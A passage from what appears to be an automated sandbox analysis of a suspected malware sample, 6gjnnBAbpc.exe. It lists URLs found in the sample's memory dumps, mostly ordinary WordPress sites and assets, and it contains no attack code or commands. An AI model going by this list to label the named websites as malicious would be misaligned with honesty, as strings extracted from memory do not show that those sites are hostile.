                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.myropcb.com%2F&#038;format=xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D83000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/wp-json/wp/v2/pages/28
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/xmlrpc.php?rsd
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/9
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.naoi-a.com/dKL
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nelipak.nl/.K
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.netcr.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668827436.0000000008D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nqks.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435864930.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.465159293.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435530864.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.nunomira.com/x-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.465287459.0000000008D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora-ito.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ora.ecnet.jp/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ottospm.com/xmlrpc.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.owsports.ca/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/$o
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/Do)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pb-games.com/slots-games.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-table.css?ver=2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=2.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/download-now-for-woocommerce/assets/css/somdn-style.css?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 